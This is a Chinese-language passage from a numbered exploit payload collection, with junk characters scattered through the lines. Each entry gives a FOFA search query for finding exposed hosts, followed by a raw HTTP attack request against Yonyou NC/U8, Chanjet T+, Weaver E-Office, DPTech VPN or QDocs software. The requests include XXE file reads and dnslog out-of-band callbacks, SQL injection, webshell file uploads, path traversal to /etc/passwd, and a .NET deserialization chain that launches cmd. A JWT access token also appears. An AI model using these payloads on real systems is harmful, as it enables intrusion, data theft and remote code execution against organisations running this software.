8 E( T- i+ B) A( t4 i, NConnection: close
$ k" v) _& P5 V7 v# q& naccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
2 k3 E# S7 r7 J6 m2 q( F6 P, tContent-Length: 190/ y; |' \& n E7 h4 E4 e) Y
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
* M1 f; r- P& _0 g! {5 e" p# m" {! }, g" ?1 c0 f k# I0 \: C
--fd28cb44e829ed1c197ec3bc71748df0
/ ]# { }3 i) u# q. }! V, E) \Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"9 P+ \0 m8 Y6 }" L
7 J6 [) S8 p5 o3 [% u3 p( c$ A$ g
<%out.println(1111*1111);%># p7 O$ }5 H4 F+ K3 B$ ?
--fd28cb44e829ed1c197ec3bc71748df0--3 U2 x1 i- _5 t, \' v x4 E6 R* U: D7 M
) {) H* I5 v: Y8 y" T
$ d3 y- B% P) ~2 u% ~ E1 n C36. 用友NC-Cloud soapFormat XXE' @4 `9 K& z/ Y0 L! a( p0 |
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
! r$ t8 ~% L6 s" @6 Q; cPOST /uapws/soapFormat.ajax HTTP/1.1
+ n1 I$ e m2 ZHost: 192.168.40.130:8989, H4 u7 [ Q$ M) ?% r7 ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
9 j8 c9 b/ f3 `: K0 f7 |- A/ l uContent-Length: 2630 ?. @) Q' s3 M$ S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 m. P/ u. \( z6 y( i# \6 ^
Accept-Encoding: gzip, deflate4 c, r+ Z$ M+ w0 d
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 N8 V. m& p/ c$ t' zConnection: close4 X; a; I; T' N8 X/ V7 {! R* Y
Content-Type: application/x-www-form-urlencoded, j! x. r F. J
Upgrade-Insecure-Requests: 15 A& n- s4 W8 u/ v3 W! w) m2 t T
1 j% }, j; [( n8 h5 g; f' ]msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
5 g5 t* s2 J% Y. p. u* e# a' w5 d) I- u0 M" x3 T# ]3 y( \8 @; W) Q
( v8 r' ^" l, S# p0 K# N+ h& p6 ^! f7 u
37. 用友NC-Cloud IUpdateService XXE/ A1 w8 w! ~' } j
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
0 }3 \! a. S j- }0 o& n. hPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
1 U+ b" {9 K9 A4 ~! u/ i- }# ?Host: 192.168.40.130:8989
- N0 {. V j, RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
% g" I W( H; u; N q% KContent-Length: 421
" u8 m' m8 e& o1 P* uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+ ^$ G9 l& Y6 e, p- q8 c, n" K) ~Accept-Encoding: gzip, deflate
* r5 t1 ?- N, xAccept-Language: zh-CN,zh;q=0.9$ S r" z# m8 N6 L" {# q% F" k
Connection: close
% E( P, |: g7 _8 \ FContent-Type: text/xml;charset=UTF-8
- U" @* C* O5 ~- U) A7 _. l3 }SOAPAction: urn:getResult. y: I6 F& O- T5 y
Upgrade-Insecure-Requests: 1
) G. ~" f" v1 x5 K4 c7 Z! h1 j/ U3 O y* v
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">* S" }' `& z9 `7 i% I, c
<soapenv:Header/>
: n! X$ @- N; Q+ h1 X3 H<soapenv:Body>
9 a0 ^" C. }3 M s& Z6 X<iup:getResult>
6 l; n* J# j1 L: R' s/ |; ^1 t" L<!--type: string-->9 [; g0 r) }) x# g) b; E
<iup:string><![CDATA[& d/ V/ Q2 Y$ r B, W, ?: Y5 x" e8 w
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
M4 x4 U+ J; a2 d" _$ S' D<xxx/>]]></iup:string>
6 X. N+ `0 d8 _" _& k</iup:getResult>+ t* U. g3 S$ i' n
</soapenv:Body>3 B7 K4 `5 A" B2 e
</soapenv:Envelope>% ?; K [# K& g" @
% N* c$ h+ x# h
- ~' ~# F: \6 K2 Z
8 F( R4 c: d! F |0 a) P# h9 s: A38. 用友U8 Cloud smartweb2.RPC.d XXE
: H' l/ F( J2 w' \3 m3 q4 }FOFA:app="用友-U8-Cloud"5 n6 _; ?" e7 s$ s% ?
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1; ~4 i( _3 Q+ A' D" W3 N8 k7 w
Host: 192.168.40.131:80883 N( M& n: c2 `" f- L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25) p1 K: Y& g" O- x {; a0 K( V
Content-Length: 260
: o. A+ U$ R' M" T% P5 r+ f$ RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
0 s% f4 e$ X5 I+ N3 z" DAccept-Encoding: gzip, deflate
6 p5 B; @% N9 ` M9 X# D& H9 z1 bAccept-Language: zh-CN,zh;q=0.95 Z6 M" e* `, h" Z. O' k
Connection: close+ x* h2 h: F$ ~/ b# c$ G2 Z
Content-Type: application/x-www-form-urlencoded
6 ]1 T5 Y% A8 y" J8 B$ Y% C* y4 i1 [7 R
& ~. j P0 O$ _% T, V__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>! O( v/ q' `, L/ g J% V! ~
: E6 u4 w) F) I: q% ?5 y7 j- U
3 L7 r$ j2 Q5 P7 O) h39. 用友U8 Cloud RegisterServlet SQL注入
& T5 y @/ L' g* E2 M2 Q, j$ v( ZFOFA:title="u8c"
6 w J6 j" F# e) X7 R2 P9 I. [' YPOST /servlet/RegisterServlet HTTP/1.1( h/ E- c# H: J- B
Host: 192.168.86.128:8089 u! \2 X# x V* P6 w, |- e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36: m% \ t- ~6 v( ?# k( {$ |+ K4 M. r
Connection: close
" [" ^; F& N# p) g2 U* z( dContent-Length: 85
. Q! X* ~- g& _, l! c5 V$ lAccept: */*
* D$ z$ Z& Z4 _- C% NAccept-Language: en5 z. N- ]: j2 k* P
Content-Type: application/x-www-form-urlencoded. }& a2 G4 C4 I9 ^2 v
X-Forwarded-For: 127.0.0.19 H4 k8 {* \/ l, F- E5 u
Accept-Encoding: gzip
6 X! O9 G' B2 u+ s, R, ]$ ?3 I |6 @5 f) {7 R s4 u" p6 }# q
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
" J! y# i3 G7 K$ _& o: ]
* l2 w2 Q& m) D/ q6 [0 [
+ g; n3 M% R; h' j40. 用友U8-Cloud XChangeServlet XXE: P1 A4 j* V9 x, s
FOFA:app="用友-U8-Cloud"+ f7 ]8 ^, @% b" Y8 K
POST /service/XChangeServlet HTTP/1.13 j5 G- x, I. w/ l+ q& R
Host: x.x.x.x
# K% Q6 d8 [3 G' b+ g, N, a/ s1 \5 FUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
: @' f2 @ }; bContent-Type: text/xml
6 C. P$ [& g2 N4 G: B* P% c, _- H7 yConnection: close
6 D" M6 @( k- a9 F3 F9 }- t
5 \5 ?6 d$ I) T) D2 ?9 H<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>' D0 Z( {8 K8 n
2 K/ |2 `) z; o* ]3 `1 Q% N/ U. g0 }: S4 e
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
- L' d( {* K* D1 [; [+ zFOFA:app="用友-U8-Cloud"& R; K3 Z" p6 @) j
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1$ A7 M9 l* ~! Z# o$ K
Host:
7 G# }% N, `) Y. eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 C2 D3 X2 Z) [, x0 S/ BContent-Type: application/json
8 T% f6 L+ d( U& FAccept-Encoding: gzip; R; m; k, C; d) D* r' G( W) x. i
Connection: close
3 N% N3 ~, J! E4 i7 a: C7 m1 ]) a5 {: b
1 X n2 A& n! A& i, D6 Z$ s! F0 u7 X _% q
42. 用友GRP-U8 SmartUpload01 文件上传: A- _1 f- D! o! i
FOFA:app="用友-GRP-U8"% J$ M8 L/ d1 v. v5 T9 ^6 J
POST /u8qx/SmartUpload01.jsp HTTP/1.11 o: \4 t( h2 V9 ?* y" I6 B
Host: x.x.x.x4 E( v, P, w9 |; C: f
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt$ N- Y5 A0 J4 l Y% u( U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
* ^# F+ R8 z* o ]$ P# l5 r- g
4 }* i! I4 @+ b# HPAYLOAD' F) J& L) U/ w0 \* o
; c! Y- ^. [" r' A( b3 o! _ y
2 q& }; n @7 ^8 i/ e7 A. khttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
3 z' F" O1 B8 G- x" |/ \$ l' D) R6 S5 z
1 E; y. |& b# i43. 用友GRP-U8 userInfoWeb SQL注入致RCE
( N6 i8 z4 s; i1 @8 p; F" ZFOFA:app="用友-GRP-U8"* Q# n$ L/ q1 s% T Z7 v# q
POST /services/userInfoWeb HTTP/1.1
* ~4 U- V2 y" O2 Q9 }( |# tHost: your-ip
, O5 T; b: T! ^8 H8 Y4 q2 h6 }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
/ s' ^/ [- J) ~! [' P7 n; W2 CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' w: T9 r- g, H/ x2 ]Accept-Encoding: gzip, deflate
$ x* D, T/ ]& \/ W6 d3 EAccept-Language: zh-CN,zh;q=0.95 y' q2 r+ B% y6 m2 O6 M0 `" V
Connection: close; R$ U1 i5 _' {8 k: `5 Y
SOAPAction:7 I" ?: L! J: J) C. r. s
Content-Type: text/xml;charset=UTF-8
6 U, O% H1 W% \: Z1 P: v- j* o
3 x9 G* k( Q. v7 ~5 ?+ p4 b<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
, W# E3 X# @- n+ W( ^1 | <soapenv:Header/>4 v( ?: e/ D# V1 l
<soapenv:Body>- \( K) k& O7 {/ U0 M. W4 p4 _
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
8 Y6 p) K2 h. P5 M; t& |& z" [ <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
% I [; F: {6 g& _ </ser:getUserNameById>" y# I" X5 z8 r3 h+ M8 l+ ^" U
</soapenv:Body>5 p; t4 M- y& j3 Z, x" q; S2 S
</soapenv:Envelope>7 q: o9 S$ h7 [: v) B# [
( _) H# y5 I& E/ `0 R
4 S# I; E. a3 X+ P3 K6 u! [44. 用友GRP-U8 bx_dj_check.jsp SQL注入3 E! r/ s4 j% k1 \
FOFA:app="用友-GRP-U8"
- {+ W. c0 h Y/ ^1 x% \! k9 HGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1' x4 C4 a- l; Y3 f) p$ z, Y: |+ M
Host: your-ip
2 G& v% f9 g# e& |3 w+ F, xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36% d6 [! o% m3 s& x9 f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 c- l8 [$ [% w: s0 c. LAccept-Encoding: gzip, deflate$ G- L: h! G$ J* r7 W
Accept-Language: zh-CN,zh;q=0.9
$ s) R8 ]6 e7 p8 l# c$ V6 QConnection: close
e6 o9 g7 ?0 T* ^- \$ T& t7 \5 z/ T8 \0 f' @
. x4 R* P( O# v" |6 x- p45. 用友GRP-U8 ufgovbank XXE
. x. }; m: {8 v+ Y! K( Y% ^+ J. NFOFA:app="用友-GRP-U8"
* p4 G! ?+ J: |, r; @* gPOST /ufgovbank HTTP/1.10 x; c: B" @- ~ u( y5 l+ o
Host: 192.168.40.130:2227 ^4 v* @% l1 ]% @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
' e% x0 p) T) ^Connection: close
% T; s5 g4 X2 E* o2 Y CContent-Length: 161" \3 z# k% R* q; @4 @- ?0 b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8& s* F& g; T- }
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: d1 `. f+ E' }( x) F; q
Content-Type: application/x-www-form-urlencoded
+ C: i+ f. E0 a& I% }Accept-Encoding: gzip0 F9 V2 h& p- e# G
( l2 k8 R( U0 x, f
reqData=<?xml version="1.0"?>
1 E3 ?2 e6 @& }+ @<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest' W6 [2 `- U3 p X
+ l) n* o! S# v6 \# |" i
- \, Y9 ~8 v$ N1 a$ J46. 用友GRP-U8 sqcxIndex.jsp SQL注入
% Q. N# ^( F8 B/ |FOFA:app="用友-GRP-U8"
" l& ~! M' r L/ p" c) o( R* GGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
' A! t4 h" ^2 Y. X( xHost: your-ip
* V1 r0 Y5 n. t7 x8 M6 ZUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.366 L+ x$ Q" k7 q: Z" T5 k. N: q' z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 }6 u* |$ W% ~* ~! Q$ m. s9 nAccept-Encoding: gzip, deflate
& {8 g r; h' eAccept-Language: zh-CN,zh;q=0.9! \5 \' ^( K( E. O
Connection: close5 K% y8 @, `. }* g$ t
3 d* ?. p% S( p9 S( c) }) x4 Q( z D( e. h8 d( R% Y
47. 用友GRP A++Cloud 政府财务云 任意文件读取
+ s( s* Q2 [0 w( u. FFOFA:body="/pf/portal/login/css/fonts/style.css"
( z; U5 z$ u: w3 ~) O: bGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
8 h$ w% s$ h/ Z. h8 V+ \5 jHost: x.x.x.x3 m- e! {0 h% J/ b1 h* f
Cache-Control: max-age=0+ G% k0 w, R4 f! C: d+ o
Upgrade-Insecure-Requests: 1
) l+ h* R, [+ Z5 m: }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36. k8 V6 Z$ n0 a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ Q e$ T3 {' W E1 J, H" iAccept-Encoding: gzip, deflate, br2 P4 u" E/ `" T3 \, ^
Accept-Language: zh-CN,zh;q=0.98 C' {6 O* x. d) G- |
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
! X" _+ J5 V" L! |9 l, r' |0 X, dConnection: close* }3 F# _1 U! q
5 ~7 v- W [5 d) V# s' H* g; @3 d0 }, w
' j/ v# L# N7 ~1 `* ?: K
48. 用友U8 CRM swfupload 任意文件上传& R. s; v, I" N5 Y; t7 [
FOFA:title="用友U8CRM"% W; [( Y; W. `
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
5 R. O+ H4 E% r4 u0 m! W" AHost: your-ip
: B4 h1 H Z" \/ n* @" {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
* O/ k9 D% n/ T: G" r6 GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! r! o8 y( r1 d- G6 W$ |
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. h" Y$ X; |0 L' k Y8 _3 eAccept-Encoding: gzip, deflate4 x/ _6 p0 T7 {
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
5 B5 s( C/ ?0 f------269520967239406871642430066855$ o0 G2 M5 H! z+ _' J* [1 X
Content-Disposition: form-data; name="file"; filename="s.php". b+ J& @7 _" p2 T" Q; O6 d: X% s9 @9 s
12316 @# g& F9 k4 t' K) z. g* b+ t( u
Content-Type: application/octet-stream
+ b4 n% z% W6 |% T( u8 b* |------269520967239406871642430066855
; G1 r5 p9 A$ G2 ?+ n4 GContent-Disposition: form-data; name="upload"/ b9 C m% ?2 u8 T3 ?( x& c
upload
: V) c6 {( W' C- F) s------269520967239406871642430066855--& `+ r$ s5 Y( h: b8 R9 r
8 e( D" Q+ a& n
" V. U% ^( P) O5 c$ j49. 用友U8 CRM系统uploadfile.php接口任意文件上传
- l9 o# j! \9 n' s: V( eFOFA:body="用友U8CRM"9 {' }, C% t) X
1 p/ h6 m- r4 ~/ |7 m. m, f/ B3 {+ BPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1- h; {- p$ O t& S" }7 P5 {
Host: x.x.x.x4 D1 u+ I) G0 m* s3 R8 H c! t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
# i/ j w: `9 \2 DContent-Length: 329' w- F/ [- {, v( B" D0 P K7 E
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
; {& m0 `4 x3 f3 Z" }% y, c: gAccept-Encoding: gzip, deflate
6 @- \0 i8 `5 z" IAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 T" `: a) C- S. W. o: y8 JConnection: close
Z" }3 U* ]$ V0 i* k9 f9 VContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w" z7 O$ Q: }; \' r
0 U! }( ^/ y# M. `, ~# {3 E, g-----------------------------vvv3wdayqv3yppdxvn3w0 a0 { z) K: n. a7 a1 ?. [1 Q
Content-Disposition: form-data; name="file"; filename="%s.php "
; _3 y* }9 q% w `- Q1 G5 _& eContent-Type: application/octet-stream
0 I) g7 {0 ?2 F: Z& D; h" L' G, ^+ ?- Y# J7 _
wersqqmlumloqa
1 ?# [- R- G9 {-----------------------------vvv3wdayqv3yppdxvn3w
9 h$ L5 s! Q1 ^( s$ w, Q& HContent-Disposition: form-data; name="upload"& x0 S1 ~2 u8 u3 w- H
/ V9 P+ o T% Y: a6 P( ^upload
" k; P4 G' p K-----------------------------vvv3wdayqv3yppdxvn3w--
- d# \+ a% R. A+ t
3 m- m0 g! E4 S& K5 C) T6 v" M( B3 F+ ]8 h, V1 \, g
http://x.x.x.x/tmpfile/updB3CB.tmp.php
# S3 q, ^; Z1 t! j, Y% ]7 |9 ~) p" h' ^$ T5 g: r# _+ z" F! l
50. QDocs Smart School 6.4.1 filterRecords SQL注入9 e4 ^% B9 F: u8 \
FOFA:body="close closebtnmodal"% J% L$ h! d+ n& {3 j9 r
POST /course/filterRecords/ HTTP/1.1
, p) Y, n6 I; B8 ^ w# SHost: x.x.x.x7 p3 w. ?4 l, s+ A/ j: r% l
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.368 d) P6 a1 j: v, `
Connection: close7 H) U8 k6 @* ~) u3 K
Content-Length: 224/ P. r7 U) t& A7 T* ]& x
Accept: */*( E( A! t( q( z6 V( A# L
Accept-Language: en& k* F" C, X* P
Content-Type: application/x-www-form-urlencoded
6 Y. J% R. x0 YAccept-Encoding: gzip) Q& F- H3 h) w/ w4 ]4 l
! w' }6 ~9 Z$ c0 T' rsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1$ S4 m: @/ u4 Q0 J
4 ]' X2 d2 E; g! o! M7 D* Z( f. Q b1 S& M0 ^- S. j& N
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
; d' n! I1 {3 d; u& ]3 I: DFOFA:app="云时空社会化商业ERP系统"
; I6 i: N, Z: h* X9 {GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.15 }) v* l& Z& }5 k
Host: your-ip
, L) h# G3 Q; }- ]3 r( k1 sUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36& H7 b! Q: U0 r' e* o _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.99 u. N2 T' E; @- M6 w/ V
Accept-Encoding: gzip, deflate
0 f& l8 e5 |# R" ~! CAccept-Language: zh-CN,zh;q=0.9+ A: t4 i! T; n" ?
Connection: close
4 `+ G, }6 O$ e) t; U9 O8 ~$ I4 @- F/ \' W# R8 ? j: |
# f i( p: \9 l3 L
52. 泛微E-Office json_common.php sql注入7 k2 d( b, x L' S2 H3 L
FOFA:app="泛微-EOffice"& ~# U6 a8 }$ ~4 } T9 _ S; W8 o
POST /building/json_common.php HTTP/1.1
- A7 D v4 g8 w, S9 IHost: 192.168.86.128:8097
9 T" r" p9 r0 k# u7 bUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
5 X+ ~; F. `9 }1 V+ z& x& I6 mConnection: close. L# m. E0 q# Z6 `: u+ Y" d
Content-Length: 87
( y ]' t) i3 S# `Accept: */*
% S/ [; r! N! B* }Accept-Language: en
* G* r9 e) r; Q5 NContent-Type: application/x-www-form-urlencoded$ H, I2 b, m& U% ]) i% L3 R) W
Accept-Encoding: gzip
( t" X7 s6 X$ q* F* B2 v% j$ G4 U/ H, i5 ]' Z
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
4 w3 H, \9 d* F/ a
$ z L1 h4 h8 k7 [. ^. h) s$ W* @
5 h0 v! D0 Q2 A& m53. 迪普 DPTech VPN Service 任意文件上传( b" E0 j+ F2 k* A" B) B
FOFA:app="DPtech-SSLVPN"
+ G4 l; D: k& c: A! c/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" o, e# N" F" a/ L: Z! l
1 m# m% a6 S X, Y
9 L; G }. d4 L4 I7 b: q! P0 A. _
54. 畅捷通T+ getstorewarehousebystore 远程代码执行2 H& K6 m, k$ | p t
FOFA:app="畅捷通-TPlus"" n# |# R) I4 p" [
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件0 g; [3 X$ J9 |/ _& ^( e% U- M
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"! c( `9 z+ S# R* \8 ~! Z$ w1 Q
+ Q# [) I/ _% _. e/ b9 {
+ i6 R% b7 ]; h3 P3 i! W
完整数据包
4 B: }2 j8 g' @. {POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
+ R8 w" n3 k7 w& \$ @Host: x.x.x.x$ N8 e/ E: b6 c; i4 C+ M! D
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F9 o0 Z% W$ Y% E6 f: M% g& l3 ~0 b
Content-Length: 593
, K: {! ^' h N1 w
. t+ k- a L4 s- e) C2 A! r( Z{6 _$ X) z. J0 Z; S7 i
"storeID":{ V7 W L( ~# y# a
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",) L7 y I0 q( o% X0 P
"MethodName":"Start",
- \( G) F! k5 T "ObjectInstance":{' j& d. ^2 u4 n | d: V5 J: T5 ^
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",$ z% c: q2 H1 P+ y3 x- G
"StartInfo":{6 o q6 h) e6 O- t
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",8 c) y4 q$ G' S+ R. W; J
"FileName":"cmd",
1 o; q ?: L. g; B( k "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
2 t+ S$ h) @: \8 U7 T3 f+ i+ V) C' S* q }/ T2 m9 b! P5 q
}
' ?% {3 x8 p1 Q- K! j) m! `+ x( c }: }" V, X. B6 U1 D$ d
}! _4 [7 u7 @8 W/ H5 b+ o9 U
5 `5 B, M! h' m+ Y& I% q" N
# J. a" i/ C, a$ o, B t第二步,访问如下url
; M4 {7 N: ]5 q, `/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt2 A* r& `9 ~! o5 q/ J9 B
% k5 M8 T: `5 [4 }0 {/ B* _
0 |; p: t0 r& L' N# c) A! r
55. 畅捷通T+ getdecallusers信息泄露" `) k% ~! E" X' f+ L* z
FOFA:app="畅捷通-TPlus"0 r) ~% X' ?/ i; q4 {$ O
第一步,通过
3 g) ^+ ]( W+ ? T/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
. E: h' y1 h# ? V第二步,利用获取到的Cookie请求* g; E E7 ]4 H* f" i, g
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
8 Q2 h1 H P' R+ w& f$ z4 l0 X
$ z2 A& h, e# @# I56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE6 K0 T- {4 b- K v u) M
FOFA: app="畅捷通-TPlus"2 W3 F- r8 P* Y" T8 M+ T
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.19 L4 w# k) [& R1 B! A
Host: x.x.x.x* E% H- b" W( R0 K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
6 j$ K+ W6 R9 B) C: ~) R: A pContent-Type: application/json
8 c o& p& B, l" O
